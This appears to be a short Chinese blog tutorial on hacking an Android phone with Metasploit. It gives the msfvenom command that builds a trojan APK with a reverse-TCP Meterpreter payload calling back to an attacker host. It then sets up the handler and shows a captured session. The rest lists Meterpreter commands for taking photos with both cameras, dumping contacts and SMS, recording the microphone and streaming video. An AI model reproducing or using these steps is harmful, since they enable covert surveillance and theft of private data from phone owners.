天天看點

MSF初體驗—入侵安卓手機

1.生成apk程式

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 R > apk.apk

2.啟動msfconsole

3.啟動use exploit/multi/handler子產品

4.set payload android/meterpreter/reverse_tcp

5.show options 

6.準備工作

msf exploit(handler) > set LHOST 192.168.1.101

LHOST => 192.168.1.101

msf exploit(handler) > set LPORT 5555

LPORT => 5555

msf exploit(handler) > exploit(運作apk程式)

[*] Started reverse TCP handler on 192.168.1.101:5555

[*] Starting the payload handler...

[*] Sending stage (63194 bytes) to 192.168.1.105

[*] Meterpreter session 1 opened (192.168.1.101:5555 -> 192.168.1.105:57629) at 2017-06-27 22:25:09 +0800

7.檢視手機資訊sysinfo

8.檢視攝像頭

meterpreter > webcam_list

1: Back Camera

2: Front Camera

9.啟動攝像頭拍照

webcam_snap -i 1

webcam_snap -i 2

dump_contacts    --》這個是導出電話

dump_sms                 --》這個是導出資訊

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

成功解決

不努力,誰會可憐你?

上一篇: lr